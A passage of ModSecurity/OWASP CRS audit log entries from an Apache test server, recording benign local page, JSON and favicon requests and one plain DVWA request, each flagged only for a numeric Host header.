[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc8tn8AAQEAABzhe1wAAAAF\"]"],"stopwatch":{"p1":620,"p2":1457,"p3":95,"p4":424,"p5":131,"sr":32,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:16 --0400","transaction_id":"WRc9RH8AAQEAABwOGoMAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc9RH8AAQEAABwOGoMAAAAB\"]"],"stopwatch":{"p1":580,"p2":1220,"p3":88,"p4":482,"p5":90,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:16 --0400","transaction_id":"WRc9RH8AAQEAABwOGoQAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:07:12 GMT","ETag":"\"107-54f6ada649b21\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc9RH8AAQEAABwOGoQAAAAB\"]"],"stopwatch":{"p1":526,"p2":919,"p3":58,"p4":139,"p5":83,"sr":21,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:17 --0400","transaction_id":"WRc9RX8AAQEAABwOGoUAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9RX8AAQEAABwOGoUAAAAB\"]"],"stopwatch":{"p1":526,"p2":1142,"p3":48,"p4":255,"p5":62,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:17 --0400","transaction_id":"WRc9RX8AAQEAABwOGoYAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9RX8AAQEAABwOGoYAAAAB\"]"],"stopwatch":{"p1":598,"p2":909,"p3":45,"p4":244,"p5":56,"sr":15,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:50 --0400","transaction_id":"WRc9Zn8AAQEAABwPUrUAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc9Zn8AAQEAABwPUrUAAAAC\"]"],"stopwatch":{"p1":645,"p2":902,"p3":62,"p4":323,"p5":55,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrYAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:07:47 GMT","ETag":"\"295-54f6adc7839e6\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc9Z38AAQEAABwPUrYAAAAC\"]"],"stopwatch":{"p1":615,"p2":1119,"p3":56,"p4":142,"p5":60,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrcAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9Z38AAQEAABwPUrcAAAAC\"]"],"stopwatch":{"p1":438,"p2":1248,"p3":69,"p4":373,"p5":65,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrgAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9Z38AAQEAABwPUrgAAAAC\"]"],"stopwatch":{"p1":442,"p2":830,"p3":44,"p4":237,"p5":46,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:01 --0400","transaction_id":"WRdBMX8AAQEAABwQSCYAAAAD","remote_address":"192.168.75.181","remote_port":47176,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBMX8AAQEAABwQSCYAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":1222,"p2":5483,"p3":101,"p4":158,"p5":89,"sr":43,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
